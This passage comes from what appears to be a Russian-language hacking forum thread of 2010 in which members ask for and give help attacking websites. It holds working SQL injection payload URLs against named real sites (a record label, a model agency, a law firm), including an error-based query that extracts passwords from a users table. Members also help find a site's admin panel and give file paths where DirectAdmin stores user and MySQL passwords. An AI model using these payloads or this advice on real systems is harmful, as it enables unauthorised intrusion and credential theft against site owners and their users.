Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. kfor

    kfor Elder - Старейшина

    Joined:
    1 Sep 2005
    Messages:
    278
    Likes Received:
    48
    Reputations:
    29
    всё зависит от определённой ситуации. Попробуй +order+by+1+--+ или вместо +--+ /* И если без ошибок, то потом order by 10000000 и смотри что получается. А так по ошибки у тебя не соответсвие типов. Ожидается значение булевого типа.
     
  2. rooopster

    rooopster New Member

    Joined:
    29 Aug 2010
    Messages:
    19
    Likes Received:
    2
    Reputations:
    0
    Пробую вывести нужные мне значения из таблицы юзеров (есть поля user_id, user_name, email, password):
    script.php?id=-166+union+select+1,2,3,4,5,6,7,8,9,0,count(1),concat((SELECT+COUNT(1)+from+users),CHAR(58),floor(rand(0)*2))+x+from+users+group+by+x
    Этот запрос выводит 3:1, то есть таблица не пуста. Когда пробую вместо SELECT+COUNT(1)+from+users писать SELECT+password+from+users+LIMIT+1, запрос проходит, соответственно инфа не выводится. В чем может быть проблема?
     
  3. necr0log

    necr0log New Member

    Joined:
    11 Aug 2010
    Messages:
    14
    Likes Received:
    2
    Reputations:
    0
    LIMIT+1,1
     
  4. rooopster

    rooopster New Member

    Joined:
    29 Aug 2010
    Messages:
    19
    Likes Received:
    2
    Reputations:
    0
    не помогло, если мне не изменяет память, LIMIT 1 - это то же, что LIMIT 0,1, так что с этим проблем быть не должно, к тому же я пробовал GRUOP_CONCAT - тоже безуспешно
     
  5. IMMORTAL_S

    IMMORTAL_S Member

    Joined:
    29 Apr 2010
    Messages:
    129
    Likes Received:
    9
    Reputations:
    2
    Сп за разъяснение! Ничего больше выдавить не получилось. Хорошо хоть есть вывод двух разных сообщений... буду крутить блинами :D
     
  6. -PRIVAT-

    -PRIVAT- Banned

    Joined:
    17 Apr 2010
    Messages:
    245
    Likes Received:
    139
    Reputations:
    87
    IMMORTAL_S, в ПМ скинь ссылку. Помогу!
     
  7. rooopster

    rooopster New Member

    Joined:
    29 Aug 2010
    Messages:
    19
    Likes Received:
    2
    Reputations:
    0
    Помогте, пожалуйста, найти вход в админку на http://www.albionrecords.org/
     
  8. kfor

    kfor Elder - Старейшина

    Joined:
    1 Sep 2005
    Messages:
    278
    Likes Received:
    48
    Reputations:
    29
    http://albionrecords.org/includes/version.xml
    Копай в этом направлении...

    И в этом http://albionrecords.org/includes/ ;)
     
  9. rooopster

    rooopster New Member

    Joined:
    29 Aug 2010
    Messages:
    19
    Likes Received:
    2
    Reputations:
    0
    благодарю :)
     
  10. AC//DC

    AC//DC Active Member

    Joined:
    28 Jul 2009
    Messages:
    419
    Likes Received:
    147
    Reputations:
    88
    http://www.albionrecords.org/stats/
     
    1 person likes this.
  11. durito

    durito Elder - Старейшина

    Joined:
    6 Jun 2008
    Messages:
    125
    Likes Received:
    24
    Reputations:
    27
    а есть кто может проконсультировать по геморройным скулям, таким как вот такая к примеру:

    http://model-talent.net/portfolios/browse.php?age_end=43+and+1=1&age_start=10&page=4&page=24&gallery_view=0
     
  12. Strilo4ka

    Strilo4ka

    Joined:
    5 Apr 2009
    Messages:
    709
    Likes Received:
    729
    Reputations:
    948
    1

    ну и где там скуля О_О
     
    3 people like this.
  13. f1ng3r

    f1ng3r [забытый полк]

    Joined:
    14 Jan 2009
    Messages:
    529
    Likes Received:
    413
    Reputations:
    256
    Code:
    http://model-talent.net/portfolios/browse.php?age_end=43[B]+and+1=[/B]1&age_start=10&page=4&page=24&gallery_view=0
    [​IMG] там скулище ))) выделил ;)
     
    #14733 f1ng3r, 3 Sep 2010
    Last edited: 3 Sep 2010
  14. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,148
    Reputations:
    886
    а сейчас попробуй and 1=0 :)
     
    _________________________
    1 person likes this.
  15. k2b1~

    k2b1~ Banned

    Joined:
    17 Jun 2010
    Messages:
    16
    Likes Received:
    1
    Reputations:
    0
    уже второй раз предупреждаю, транслитом не писать!
     
    #14735 k2b1~, 3 Sep 2010
    Last edited by a moderator: 3 Sep 2010
  16. R1dex

    R1dex Elder - Старейшина

    Joined:
    17 Sep 2008
    Messages:
    255
    Likes Received:
    132
    Reputations:
    19
    http://www.hayesbklaw.com/index.php?id=1'+and+substring(version(),1,1)='5

    или

    http://www.hayesbklaw.com/index.php?id=1'%20or%20(select%20count(*)%20from%20(select%201%20union%20select%202%20union%20select%203)x%20group%20by%20concat((select+table_name+from+information_schema.tables+limit+1),floor(rand(0)*2)))--+
     
  17. tracy

    tracy Elder - Старейшина

    Joined:
    24 Mar 2009
    Messages:
    244
    Likes Received:
    119
    Reputations:
    40
    Какие методы вывода путя до корня из sqli
    п.с искат по всем страницам было не охотт(((
    кроме []
     
  18. Strilo4ka

    Strilo4ka

    Joined:
    5 Apr 2009
    Messages:
    709
    Likes Received:
    729
    Reputations:
    948
    Пробуйте через идентификатор сесии и не парьтесь(но не факт что она стартует!), а так провоцируйте ресурс к "неожиданным(недокументированым) ситуациям", любым, которые и выплюнут(возможно) ошибку.
    Если sqli сопровождаетцо инклудом(читалкой ...) можно запросить несуществующий файл и если ошибки не подавлены, то будет ошибка. При не верном запросе, также можно еще попытатцо логи прочитайть если есть привилегии у пользователя mysql(если речь о mysql иньекциях load_file!), например лог с ошибками(запросить перед етим несущетсвующий файл), ну понятно что надо искать лог.

    одним словом варианты есть (чем > практики тем больше фантазии! ).
    гугл в помочь еще.

    зы не надо привязыватцо для раскрытия к sqli только.
     
    #14738 Strilo4ka, 3 Sep 2010
    Last edited: 3 Sep 2010
    1 person likes this.
  19. Shadrin

    Shadrin Elder - Старейшина

    Joined:
    20 Aug 2008
    Messages:
    263
    Likes Received:
    109
    Reputations:
    18
    подскажите где директ админ пароли пользователей хранит? в шадов?
     
  20. daniel_1024

    daniel_1024 Elder - Старейшина

    Joined:
    15 Jul 2009
    Messages:
    260
    Likes Received:
    227
    Reputations:
    386
    искать где-то тут надо наверно: /usr/local/directadmin/
    тут пароль от мускуля /usr/local/directadmin/conf/mysql.conf
     
    #14740 daniel_1024, 5 Sep 2010
    Last edited: 5 Sep 2010
Thread Status:
Not open for further replies.